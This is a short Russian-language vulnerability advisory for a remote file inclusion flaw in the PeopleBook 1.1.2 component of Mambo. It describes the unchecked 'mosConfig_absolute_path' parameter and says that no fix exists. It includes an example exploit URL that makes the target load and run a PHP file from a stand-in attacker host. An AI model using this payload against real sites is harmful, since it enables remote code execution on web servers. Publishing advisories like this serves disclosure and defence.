Программа: PeopleBook (компонент Mambo) 1.1.2, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимостьсуществует из-за недостаточной обработки входных данных в параметре"mosConfig_absolute_path" в сценарииadministrator/components/com_peoplebook/param.peoplebook.php. Удаленныйпользователь может выполнить произвольный PHP сценарий на целевойсистеме с привилегиями Web сервера. Для удачной эксплуатации уязвимостиопция "register_globals" должна быть включена в конфигурационном файлеPHP. Пример:
http://[target]/[path]/administrator/components/com_peoplebook/param.
peoplebook.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
URL производителя: mamboxchange.com/projects/peoplebook
Решение: Способов устранения уязвимости не существует в настоящее время.